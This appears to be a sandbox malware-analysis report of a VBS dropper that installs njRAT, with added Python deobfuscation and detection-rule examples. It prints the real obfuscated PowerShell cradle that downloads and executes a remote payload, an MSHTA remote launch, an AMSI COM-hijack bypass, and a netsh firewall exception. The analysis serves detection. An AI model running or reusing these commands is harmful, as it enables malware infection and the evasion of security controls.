Analysis

  • max time kernel
    135s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09-08-2022 18:31

General

  • Target

    DWRNHNKWSJEHWYPNYOGGOP.vbs

  • Size

    1KB

  • MD5

    43f89bd927a7e80c8240c61617dee7bf

  • SHA1

    6a8ab5c11c1afd276cf5dbb7b125cff26080459f

  • SHA256

    f835187e4e7703e00b2da9f5cca7b9a4ab87d26d27b09e5112d563f6f96dcc9a

  • SHA512

    f637d2cdbd59a730b65c770d66c2767febe5f9e8662d133717922990fbf3934a4026b5929960c8dfbfdb228cf164b9390badbc92b19dde11f9ebe5a1018379e4

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://tradeguru.com.pk/enc2.txt

Extracted

Family

njrat

Version

1.9

Botnet

HacKed

Mutex

Microsoft.Exe

Attributes
  • reg_key

    Microsoft.Exe

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 3 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Registers COM server for autorun 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DWRNHNKWSJEHWYPNYOGGOP.vbs"
    1⤵
      PID:4684
    • C:\Windows\system32\MSHTA.EXE
      MSHTA.EXE https://tradeguru.com.pk/enc2.txt
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      PID:4648
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
      POWERSHELL $HKXSZJPBSFUQNNKBRSHJOKP = '[$=^&7<[[=$0$]=)38}@{(4y$=^&7<[[=$0$]=)38}@{(4t{<1[36&1{3\}0_-\[[14<5*<=7#&\!{9^]&374-84*${.IO.$=^&7<[[=$0$]=)38}@{(4t324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-*<=7#&\!{9^]&374-84*${324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-d{<1[36&1{3\}0_-\[[14<5324)23*2469!/&^!\_0=)7]'.Replace('$=^&7<[[=$0$]=)38}@{(4','S').Replace('{<1[36&1{3\}0_-\[[14<5','E').Replace('324)23*2469!/&^!\_0=)7','R').Replace('&2#/!0/&-%5_]<-$4%%-<-','A').Replace('*<=7#&\!{9^]&374-84*${','M');$HJZACFIGWCGSTKQFFJFCJWC = ($HKXSZJPBSFUQNNKBRSHJOKP -Join '')|&('I'+'EX');$HRIYRXVTBWQWWOVQDADEHPL = '[69_&(%*}8]8-%$74]$(#_]y69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}5<%_7<=7_#!{{$&]\%{/1)m.N5<%_7<=7_#!{{$&]\%{/1))-({\)@+/1405_2\8*427}.W5<%_7<=7_#!{{$&]\%{/1)bR5<%_7<=7_#!{{$&]\%{/1)qu5<%_7<=7_#!{{$&]\%{/1)69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}]'.Replace('69_&(%*}8]8-%$74]$(#_]','S').Replace('5<%_7<=7_#!{{$&]\%{/1)','E').Replace(')-({\)@+/1405_2\8*427}','T');$HIXNVHEWCKNIFDLFJKSVBHD = ($HRIYRXVTBWQWWOVQDADEHPL -Join '')|&('I'+'EX');$HEPSSGXVTPJJSQLTBOWCTGE = '<[@63<_-53]5@$7[&63/^@r{(51(<04]=6-&01#378}1-a+810347\=@2(3-23#_%166{(51(<04]=6-&01#378}1-'.Replace('<[@63<_-53]5@$7[&63/^@','C').Replace('{(51(<04]=6-&01#378}1-','E').Replace('+810347\=@2(3-23#_%166','T');$HZAUFQYTLDKVFSGTXHYBUGZ = '/(\][54[=_@1]\<9\6\<<{+\88!1}*@<(&9#@692{]_@tR+\88!1}*@<(&9#@692{]_@82]534-04766\1_){4160#pon82]534-04766\1_){4160#+\88!1}*@<(&9#@692{]_@'.Replace('/(\][54[=_@1]\<9\6\<<{','G').Replace('+\88!1}*@<(&9#@692{]_@','E').Replace('82]534-04766\1_){4160#','S');$HRBPYOHOXEOEQFNKBXSNNCQ = 'G!4%@&_9+[%3[)^&%72#813t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@pon$@)(]=][6450_6!7\={3[@!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813am'.Replace('$@)(]=][6450_6!7\={3[@','S').Replace('!4%@&_9+[%3[)^&%72#813','E').Replace('1(!%9*60#7&21^5^67(%8_','R');$HXLAGAHHFUIJNGIUXVDWXPH = 
'8}*[+%^=_)@93]23#=&&3[!*%1!+]6_&}@@^]$[+}_*]a+-#8%3}]/+*#^1@+5{[%/[To!*%1!+]6_&}@@^]$[+}_*]n+-#8%3}]/+*#^1@+5{[%/['.Replace('8}*[+%^=_)@93]23#=&&3[','R').Replace('!*%1!+]6_&}@@^]$[+}_*]','E').Replace('+-#8%3}]/+*#^1@+5{[%/[','D');&('I'+'EX')($HJZACFIGWCGSTKQFFJFCJWC::new($HIXNVHEWCKNIFDLFJKSVBHD::$HEPSSGXVTPJJSQLTBOWCTGE('https://tradeguru.com.pk/Server2.txt').$HZAUFQYTLDKVFSGTXHYBUGZ().$HRBPYOHOXEOEQFNKBXSNNCQ()).$HXLAGAHHFUIJNGIUXVDWXPH())
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4624
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1'"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1808
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbs"
          3⤵
            PID:632
      • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
        POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat
        1⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4168
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1436
          • C:\Windows\system32\reg.exe
            REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
            3⤵
            • Modifies registry class
            • Modifies registry key
            PID:2960
          • C:\Windows\system32\reg.exe
            REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
            3⤵
            • Registers COM server for autorun
            • Modifies registry class
            • Modifies registry key
            PID:2268
          • C:\Windows\system32\cmd.exe
            cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1128
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'"
              4⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3568
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1272
                • C:\Windows\SysWOW64\netsh.exe
                  netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
                  6⤵
                  • Modifies Windows Firewall
                  PID:4072
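
The POWERSHELL.exe command line above (PID 4624) hides its download cradle behind junk tokens: every single-quoted literal is a .NET name with its significant letters swapped for a 22-character random string, and a chain of `.Replace()` calls swaps them back just before the `('I'+'EX')` invocation. Resolving the chains gives `[System.IO.StreamReader]`, `[System.Net.WebRequest]`, `Create`, `GetResponse`, `GetResponseStream` and `ReadToEnd`, so the stage reads `https://tradeguru.com.pk/Server2.txt` and passes the body to Invoke-Expression without writing it to disk; that second-stage URL appears only in the command line, not in the extracted config above. The script below is an added example, not part of this report or of the sandbox, that performs the same resolution statically, so no PowerShell is executed. Its input is a constructed, shortened command in the same scheme, with the report's variable names and URL but short junk tokens (`@@1`, `##2`, ...) in place of the real ones; it assumes literals contain no quote characters or semicolons, so the doubled-quote escape is not handled.

```python
import re

# A single-quoted PowerShell literal. The tokens in this scheme contain no quote
# characters, so the doubled-quote escape ('') is deliberately not handled.
LIT = r"'([^']*)'"
# One .Replace('old','new') call, and a literal followed by a chain of them.
REPLACE_CALL = re.compile(r"\.Replace\(" + LIT + "," + LIT + r"\)", re.IGNORECASE)
CHAIN = re.compile(LIT + r"((?:\.Replace\('[^']*','[^']*'\))+)", re.IGNORECASE)
# ('I'+'EX')-style concatenation of two literals.
CONCAT = re.compile(r"\(\s*'([^']*)'\s*\+\s*'([^']*)'\s*\)")
# $name = 'literal';   and   $alias = ($name -Join '')|&('IEX');
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;")
IEX_ASSIGN = re.compile(
    r"\$(\w+)\s*=\s*\(\s*\$(\w+)\s+-Join\s+''\s*\)\s*\|\s*&\('IEX'\)\s*;", re.IGNORECASE)
VAR = re.compile(r"\$(\w+)")
URL = re.compile(r"https?://[^\s'\"()]+")

# Constructed input in the same scheme as PID 4624's command line: the report's variable
# names and URL, but short junk tokens (@@1, ##2, ...) instead of the 22-character ones.
SAMPLE = (
    "$HKXSZJPBSFUQNNKBRSHJOKP = '[@@1y@@1t##2&&3.IO.@@1t%%4##2**5&&3%%4##2**5d##2%%4]'"
    ".Replace('@@1','S').Replace('##2','E').Replace('%%4','R').Replace('**5','A').Replace('&&3','M');"
    "$HJZACFIGWCGSTKQFFJFCJWC = ($HKXSZJPBSFUQNNKBRSHJOKP -Join '')|&('I'+'EX');"
    "$HRIYRXVTBWQWWOVQDADEHPL = '[@@1y@@1##6##2m.N##2##6.W##2bR##2qu##2@@1##6]'"
    ".Replace('@@1','S').Replace('##2','E').Replace('##6','T');"
    "$HIXNVHEWCKNIFDLFJKSVBHD = ($HRIYRXVTBWQWWOVQDADEHPL -Join '')|&('I'+'EX');"
    "$HEPSSGXVTPJJSQLTBOWCTGE = '!!7r##2a##6##2'.Replace('!!7','C').Replace('##2','E').Replace('##6','T');"
    "$HZAUFQYTLDKVFSGTXHYBUGZ = 'G##2tR##2@@1pon@@1##2'.Replace('##2','E').Replace('@@1','S');"
    "$HRBPYOHOXEOEQFNKBXSNNCQ = 'G##2t%%4##2@@1pon@@1##2@@1t%%4##2am'"
    ".Replace('@@1','S').Replace('##2','E').Replace('%%4','R');"
    "$HXLAGAHHFUIJNGIUXVDWXPH = '%%4##2a++8To##2n++8'.Replace('%%4','R').Replace('##2','E').Replace('++8','D');"
    "&('I'+'EX')($HJZACFIGWCGSTKQFFJFCJWC::new($HIXNVHEWCKNIFDLFJKSVBHD::$HEPSSGXVTPJJSQLTBOWCTGE("
    "'https://tradeguru.com.pk/Server2.txt').$HZAUFQYTLDKVFSGTXHYBUGZ().$HRBPYOHOXEOEQFNKBXSNNCQ())"
    ".$HXLAGAHHFUIJNGIUXVDWXPH())"
)


def fold_chain(m):
    """Apply a literal's .Replace() calls in the same left-to-right order PowerShell would."""
    text = m.group(1)
    for old, new in REPLACE_CALL.findall(m.group(2)):
        text = text.replace(old, new)
    return "'" + text + "'"


def deobfuscate(cmd):
    """Resolve the scheme statically; returns (remaining statement, variable values)."""
    text = CHAIN.sub(fold_chain, cmd)
    text = CONCAT.sub(lambda m: "('" + m.group(1) + m.group(2) + "')", text)
    env = {}

    def take_literal(m):
        env[m.group(1)] = m.group(2)
        return ""

    def take_iex(m):
        # IEX of a folded literal such as '[System.IO.StreamReader]' evaluates to that
        # type; its textual form is unchanged, so the alias just copies the string.
        env[m.group(1)] = env.get(m.group(2), "$" + m.group(2))
        return ""

    text = ASSIGN.sub(take_literal, text)
    text = IEX_ASSIGN.sub(take_iex, text)
    text = VAR.sub(lambda m: env.get(m.group(1), m.group(0)), text)
    return text.strip(), env


def extract_urls(text):
    return URL.findall(text)


if __name__ == "__main__":
    statement, variables = deobfuscate(SAMPLE)
    for name, value in variables.items():
        print(f"${name} = {value}")
    print(statement)
    print("URLs:", extract_urls(statement))
```

The resolved statement keeps the attacker's mixed case (`StREAMREAdER`, `GEtRESponSE`); PowerShell member and type lookup is case-insensitive, so the output is compared case-insensitively when matched against known cradles. For the real command line the same three passes apply, but expect to extend the literal regex if a sample ever places a quote or semicolon inside a token.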

      Network

      MITRE ATT&CK Matrix (ATT&CK v6)

      • Persistence
        Modify Existing Service (T1031): 1
        Registry Run Keys / Startup Folder (T1060): 1
      • Defense Evasion
        Modify Registry (T1112): 1
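
Read as a chain, the process tree offers a detection opportunity at every link: wscript.exe spawning mshta.exe with an https URL, mshta.exe spawning PowerShell, the Replace/IEX cradle, reg.exe writing `InProcServer32` under `HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}`, the `PoWerShelL"."eXe` spelling (cmd.exe strips the quotes, so the process runs, but naive substring matches on `powershell.exe` miss it), an argument-less aspnet_compiler.exe child of PowerShell (the SetThreadContext/WriteProcessMemory target whose 64KB region at 0x400000 is dumped above) and netsh adding a firewall exception for that binary. One caveat on the registry write: the report's signature labels it a COM server registration for autorun, but that CLSID is the one AMSI's COM server is registered under, and pointing it at a DLL that does not exist is the documented COM-hijack AMSI bypass, which makes AMSI initialisation fail in PowerShell processes started afterwards; the very next step in the tree is a hidden `-ep ByPaSs` PowerShell running the 604KB JQEIQFWPUTYRZYJCTCTPUB.ps1. Whether the bypass still works on this Windows build is not something the report shows. Below is an added Python example, not from the report or the sandbox vendor, that encodes those checks as rules over process-creation events. The events are constructed from the tree (parent images are assumed from its nesting, with explorer.exe assumed for the top process, the cradle command line is shortened to its telltale pieces, and PID 9001 is a benign control), so it runs offline; the field names are generic, not a specific SIEM schema.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


SYS = r"C:\Windows\System32"
PS = SYS + r"\WindowsPowerShell\v1.0\powershell.exe"
NET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"

# Constructed from the process tree in this report, not a real log export. Parent images
# are assumed from the tree's nesting (explorer.exe for the top), the IEX command line
# is shortened to its telltale pieces, and PID 9001 is a benign control.
EVENTS = [
    ProcEvent(4684, SYS + r"\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DWRNHNKWSJEHWYPNYOGGOP.vbs"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(4648, SYS + r"\MSHTA.EXE", "MSHTA.EXE https://tradeguru.com.pk/enc2.txt", SYS + r"\WScript.exe"),
    ProcEvent(4624, PS,
              "POWERSHELL $H = '[@@1y@@1tem.IO.@@1treamReader]'.Replace('@@1','S').Replace('##2','E')"
              ".Replace('%%4','R');$J = ($H -Join '')|&('I'+'EX');&('I'+'EX')($J::new(...))",
              SYS + r"\MSHTA.EXE"),
    ProcEvent(2960, SYS + r"\reg.exe",
              r"REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f", SYS + r"\cmd.exe"),
    ProcEvent(2268, SYS + r"\reg.exe",
              r"REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32"
              r" /ve /t REG_SZ /d C:\IDontExist.dll /f", SYS + r"\cmd.exe"),
    ProcEvent(3568, PS,
              r'PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& '
              r"'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'" + '"', SYS + r"\cmd.exe"),
    ProcEvent(1272, NET + r"\aspnet_compiler.exe", '"' + NET + r'\aspnet_compiler.exe"', PS),
    ProcEvent(4072, r"C:\Windows\SysWOW64\netsh.exe",
              'netsh firewall add allowedprogram "' + NET + r'\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE',
              NET + r"\aspnet_compiler.exe"),
    ProcEvent(9001, PS, "powershell.exe -NoProfile -Command Get-Process", r"C:\Windows\explorer.exe"),
]

AMSI_CLSID = "{fdb00e52-a214-4aa1-8fba-4357bb0072ec}"  # CLSID of the AMSI COM server
# .NET utilities commonly used as hollowing hosts; normally they never run without arguments.
DOTNET_HOSTS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe"}


def base(path):
    return path.rsplit("\\", 1)[-1].lower()


def grep(pattern, text):
    return re.search(pattern, text, re.IGNORECASE) is not None


def only_image(cmd):
    """True when the command line is nothing but the (optionally quoted) executable."""
    return re.fullmatch(r'\s*(?:"[^"]+"|\S+)\s*', cmd) is not None


RULES = {
    "wscript_spawns_mshta": lambda e: base(e.image) == "mshta.exe"
        and base(e.parent_image) in {"wscript.exe", "cscript.exe"},
    "mshta_remote_url": lambda e: base(e.image) == "mshta.exe" and grep(r"https?://", e.cmdline),
    "mshta_spawns_powershell": lambda e: base(e.image) == "powershell.exe"
        and base(e.parent_image) == "mshta.exe",
    "powershell_split_iex": lambda e: base(e.image) == "powershell.exe"
        and grep(r"\(\s*'I'\s*\+\s*'EX'\s*\)", e.cmdline),
    "powershell_replace_chain": lambda e: base(e.image) == "powershell.exe"
        and len(re.findall(r"\.Replace\(", e.cmdline, re.IGNORECASE)) >= 3,
    # Only the InProcServer32 write matters; creating the bare key (PID 2960) is noise.
    "amsi_com_server_hijack": lambda e: base(e.image) == "reg.exe"
        and AMSI_CLSID in e.cmdline.lower() and "inprocserver32" in e.cmdline.lower(),
    "powershell_hidden_bypass": lambda e: base(e.image) == "powershell.exe"
        and grep(r"-w(?:in|indowstyle)?\s+hid", e.cmdline)
        and grep(r"-e(?:p|xecutionpolicy)?\s+bypass", e.cmdline),
    "quote_split_command_name": lambda e: grep(r'\w"\."\w', e.cmdline),
    "dotnet_host_no_args_from_powershell": lambda e: base(e.image) in DOTNET_HOSTS
        and base(e.parent_image) in {"powershell.exe", "pwsh.exe"} and only_image(e.cmdline),
    "netsh_firewall_allow": lambda e: base(e.image) == "netsh.exe"
        and grep(r"firewall\s+add\s+(?:allowedprogram|rule)", e.cmdline),
}


def run_rules(events):
    """Map each rule name to the sorted PIDs it fired on."""
    hits = {}
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits.setdefault(name, []).append(e.pid)
    return {name: sorted(pids) for name, pids in hits.items()}


if __name__ == "__main__":
    for name, pids in run_rules(EVENTS).items():
        print(f"{name}: {pids}")
```

Each rule on its own is a medium-confidence signal (the netsh and reg.exe lines in particular have legitimate administrative uses); the value is that every PID in this tree except the first wscript.exe trips at least one of them while the benign control trips none, so correlating hits along the parent chain is what turns them into a high-confidence alert.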

      Downloads

      • C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat
        Filesize

        706B

        MD5

        6a90128893777a59d404d46d3e967104

        SHA1

        e2b70c13764f2f61aa8503999670542237046bc4

        SHA256

        b986b6412802dadf97cc3684372614c084a723c25ad5db606c59a7445914b319

        SHA512

        5e8ed2c486b6e0832fb1516d27a63e531355c61155259438f5d2ab220e0545786a76f3633499d721b94d5857e2d0ce2c04b6ae8918bc316ed639b926fdfa794c

      • C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1
        Filesize

        3KB

        MD5

        43864d67842266f76a91dc4aee7338c7

        SHA1

        022259ecb6970f6790c329e36b94402ba815b5e0

        SHA256

        c9aee12c943156b698c5f5413fb0a6bbca87d0dec227d972e59dc974ac39decf

        SHA512

        32bb0b67d9ec8064b13a2db93940ed41ce8bc352364a0222dcef7fc6bef98b7c3a579f608fb3cb5d6b81db49a58b736600831f5c40651e058a635f7502d55980

      • C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbs
        Filesize

        1KB

        MD5

        d6a5f499f7164e0d61a5b8a0b4900fba

        SHA1

        054352e97c7aa7cf0eb3b0cf2ded905fc22a70b9

        SHA256

        5b5e07e5a147d23983fe0adb7fed1c95f76ffe9443bd1394d4a8248a80ad2e44

        SHA512

        2129eb026a406fc52057f1efb9c81e1e8696971ff738093671e1c794c4cb77022bcb8b980c4fc7b1705451e9b86d2cdec87ad35b198d002035cf95dc904ebec2

      • C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1
        Filesize

        604KB

        MD5

        ab1fce3ab2f6f211da8f8dc30c2b3060

        SHA1

        ae0dff660b20f9209a66029d44b048a63cc80336

        SHA256

        7cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca

        SHA512

        ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
        Filesize

        3KB

        MD5

        00e7da020005370a518c26d5deb40691

        SHA1

        389b34fdb01997f1de74a5a2be0ff656280c0432

        SHA256

        a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

        SHA512

        9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        0ab03b4ab0ee8273a1eea28cef1ca1e7

        SHA1

        8a305ca40e71bd2b04b20c65e28730e3ff3f50b2

        SHA256

        695a48145171a84d61778fe33c410d3195109c7c59a2b1038a1f3ca14c52a3ed

        SHA512

        7347810d3c514b343def26aa42e4b758fc1cdd8a9e57c529de49615b995c8c1dab942d83d432a5ee6e022bbefd020d6b1d920ffa61a9ca2617ff8b67ce3c4f72

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        171c8388c36c7ff24bff6d83366bcbd6

        SHA1

        b457641f8c88a56590921ce729d3111a8964107a

        SHA256

        cbb779c4ad16523953107fa4344f29750fd398216b1769ad9476c43ebe919621

        SHA512

        94889b43df68c6fd761e946a220a7deea68318d9685ffe6c42926e647bbf1f3ef650a1c7dc7e7ffe66e4f02c97a32d4105502c9c8835e14795dcd85088b60e99

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        a6c9d692ed2826ecb12c09356e69cc09

        SHA1

        def728a6138cf083d8a7c61337f3c9dade41a37f

        SHA256

        a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

        SHA512

        2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

      • memory/632-137-0x0000000000000000-mapping.dmp
      • memory/1128-144-0x0000000000000000-mapping.dmp
      • memory/1272-158-0x0000000005760000-0x00000000057FC000-memory.dmp
        Filesize

        624KB

      • memory/1272-163-0x0000000005E50000-0x0000000005E5A000-memory.dmp
        Filesize

        40KB

      • memory/1272-159-0x0000000005E60000-0x0000000006404000-memory.dmp
        Filesize

        5.6MB

      • memory/1272-160-0x00000000058B0000-0x0000000005942000-memory.dmp
        Filesize

        584KB

      • memory/1272-162-0x0000000005DB0000-0x0000000005E16000-memory.dmp
        Filesize

        408KB

      • memory/1272-152-0x0000000000400000-0x0000000000410000-memory.dmp
        Filesize

        64KB

      • memory/1272-153-0x000000000040BBBE-mapping.dmp
      • memory/1436-140-0x0000000000000000-mapping.dmp
      • memory/1808-134-0x0000000000000000-mapping.dmp
      • memory/1808-148-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/1808-136-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/2268-143-0x0000000000000000-mapping.dmp
      • memory/2960-142-0x0000000000000000-mapping.dmp
      • memory/3568-155-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/3568-147-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/3568-145-0x0000000000000000-mapping.dmp
      • memory/4072-161-0x0000000000000000-mapping.dmp
      • memory/4168-157-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/4168-139-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/4624-131-0x000001B54A770000-0x000001B54A792000-memory.dmp
        Filesize

        136KB

      • memory/4624-151-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/4624-133-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/4624-132-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB